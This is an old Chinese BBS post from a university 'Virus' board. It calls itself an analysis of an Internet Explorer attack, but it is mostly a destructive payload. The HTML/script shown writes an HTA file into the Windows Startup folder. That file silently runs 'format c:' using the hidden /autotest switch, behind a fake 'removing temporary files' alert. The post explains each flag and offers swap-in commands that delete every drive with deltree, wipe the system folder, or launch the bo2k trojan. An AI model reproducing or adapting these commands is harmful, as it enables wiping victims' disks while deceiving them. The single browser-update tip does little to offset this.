Virus 版 (精华区)

发信人: zanwilson (嗷嗷累), 信区: Virus
标  题: 关于格式化硬盘病毒的分析（请勿效仿，后果自负）
发信站: 哈工大紫丁香 (2001年12月14日09:35:20 星期五), 站内信件

这项技术是在没多久以前台湾所流行的攻击法
　　这一项教学就是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生
    出来的攻击方法。在此仅供了解病毒机理所用，请勿效仿，否则一切后果自负。

　　以下这段就是具有破坏性的HTML
　　Hacking Your Computer .
　　scr.Reset();
　　scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";
　　scr.Doc="
　　wsh.Run(’start.exe /m format c:/q /autotest /u’);
　　alert(’IMPORTANT : Windows is removing unused temporary files.’);";
　　scr.write();
　　(懂HTML的人应该就看得出来其中精随)

　　现在大概来解释其中几个项目所写的意思
　　scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"
　　这一项就是指当你看到这网页它会写入到你的电脑启动目录底下，并命名为
　　hack.hta

　　wsh.Run(’start.exe /m format c:/q /autotest /u’);
　　通常要格式化硬碟都会先问你是否要执行，但其中的"/autotest"这项。
　　它是一个微软没有公开的功能，键入後format的动作便会被强制执行。
　　这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。
　　最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
    化的状态。

　　执行其他攻击指令的方法∶
　　只要修改“start.exe /m format c:/q /autotest /u”这一项便形。
　　start.exe /m format c:/q /autotest /u
　　其中的“c:”可以换做其他的硬碟。
　　(path)\bo2k.exe
　　执行它电脑中的某个程式，如果你有传bo2k到它电脑中就可以使用此指令。
　　start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
　　杀掉对方硬碟底下所有的档案。
　　start.exe /m deltree /y c:\windows\system\*.*
　　杀掉对方c:\windows\system\目录底下的所有档案。
　　後叙∶
　　预防遭此手段的破坏就是到微软去更新你的浏览器。

--
珍惜现在 珍惜拥有

※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 天外飞仙]